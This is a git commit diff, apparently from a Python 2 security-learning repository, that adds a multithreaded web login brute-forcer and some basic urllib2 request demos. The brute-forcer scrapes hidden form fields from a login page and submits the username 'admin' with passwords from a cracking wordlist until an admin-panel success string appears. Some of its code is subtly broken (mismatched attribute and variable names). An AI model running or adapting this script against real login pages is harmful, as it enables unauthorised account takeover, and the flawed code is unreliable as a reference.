urllib2 simple scripts

This commit is contained in:
Mari Wahl 2014-12-30 11:10:39 -05:00
parent ac8064080f
commit 735f5804f1
161 changed files with 16521413 additions and 25 deletions

View file

@ -3,3 +3,113 @@
__author__ = "bt3"
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
from brute_forcing_locations import build_wordlist
THREAD = 10
USERNAME = 'admin'
WORDLIST = '../files_and_dir_lists/passwords/cain.txt'
RESUME = None
# where the script donwload and parse HTML
TARGET_URL = 'http://localhost:80/admininstrator/index.php'
# where to submit the brute-force
TARGET_POST = 'http://localhost:80/admininstrator/index.php'
USERNAME_FIELD = 'username'
PASSWORD_FIELD = 'passwd'
# check for after each brute-forcing attempting to determine sucess
SUCESS_CHECK = 'Administration - Control Panel'
class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False
print 'Finished setting up for: ' + username
def run_bruteforce(self):
for i in range(THREAD):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
# after we grab our password attempt, we set the cookie jar,
# and this calss will store cookies in the cookies file
jar = cookielib.FileCookieJar('cookies')
# initialize the urllib2 opener
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(TARGET_URL)
page = response.read()
print "Trying: %s : %s (%d left)" %(self.username, brute, \
self.passwd_q.qsize())
# parse out the hidden fields
# make the initial request to retrieve the login form
# when we have the raw html we pass it off our html parser
# and call its feed method, which returns a dictionary of all
# the retrieved form elements
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add our username and password fields
post_tags[USERNAME_FIELD] = self.username
post_tags[PASSWORD_FIELD] = brute
# URL encode the POST variables and pass it to the
# HTTP request
login_data = urllib.urlencode(post_tags)
login_response = opener.open(TARGET_POST, login_data)
login_result = login_response.read()
if SUCESS_CHECK in login_result:
self.found = True
print '[*] Bruteforce successful.'
print '[*] Username: ' + username
print '[*] Password: ' + brute
print '[*] Waiting for the other threads to exit...'
# core of our HTML processing: the HTML parsing class to use
# against the target.
class BruteParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
# creaaate a dictionary for results
self.tag_results = {}
# called whenever a tag is found
def handle_starttag(self, tag, attrs):
# we are look for input tags
if tag == 'input':
tag_name = None
tag_value = None
for name, value in attrs:
if name == 'name':
tag_name = value
if name == 'value':
tag_value = value
if tag_name is not None:
self.tag_results[tag_name] = value
if __name__ == '__main__':
words = build_wordlist(WORDLIST)
brute_obj = Bruter(USERNAME, words)
brute_obj.run_bruteforce()

View file

@ -1,25 +0,0 @@
#!/usr/bin/env python
__author__ = "bt3"
import urllib2
def get(url):
msg = urllib2.urlopen(url)
print msg.read()
def get_user_agent(url):
headers = {}
headers['User-Agent'] = 'Googlebot'
request = urllib2.Request(url, headers=headers)
response = urllib2.urlopen(request)
print response.read()
response.close()
if __name__ == '__main__':
HOST = 'http://www.google.com'
get_user_agent(HOST)

View file

@ -0,0 +1,76 @@
#!/usr/bin/env python
__author__ = "bt3"
import urllib2
import urllib
def post_general(url):
values = {'name' : 'Dana Scullt',
'location' : 'Virginia',
'language' : 'Python' }
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
print response.read()
def get_general(url):
msg = urllib2.urlopen(url)
print msg.read()
def get_fancy(url):
response = urllib2.urlopen(url)
print 'RESPONSE:', response
print 'URL :', response.geturl()
headers = response.info()
print 'DATE :', headers['date']
print 'HEADERS :'
print '---------'
print headers
data = response.read()
print 'LENGTH :', len(data)
print 'DATA :'
print '---------'
print data
def get_user_agent(url):
headers = {}
headers['User-Agent'] = 'Googlebot'
request = urllib2.Request(url, headers=headers)
request = urllib2.Request('http://www.google.com/')
request.add_header('Referer', 'http://www.python.org/')
request.add_header('User-agent', 'Mozilla/5.0')
response = urllib2.urlopen(request)
#print response.read()
print "The Headers are: ", response.info()
print "The Date is: ", response.info()['date']
print "The Server is: ", response.info()['server']
response.close()
def error(url):
request = urllib2.Request('http://aaaaaa.com')
try:
urllib2.urlopen(request)
except urllib2.URLError, e:
print e.reason
if __name__ == '__main__':
HOST = 'http://www.google.com'
#get_user_agent(HOST)
#get_fancy(HOST)
#post_general(HOST)
#get_user_agent(HOST)
error(HOST)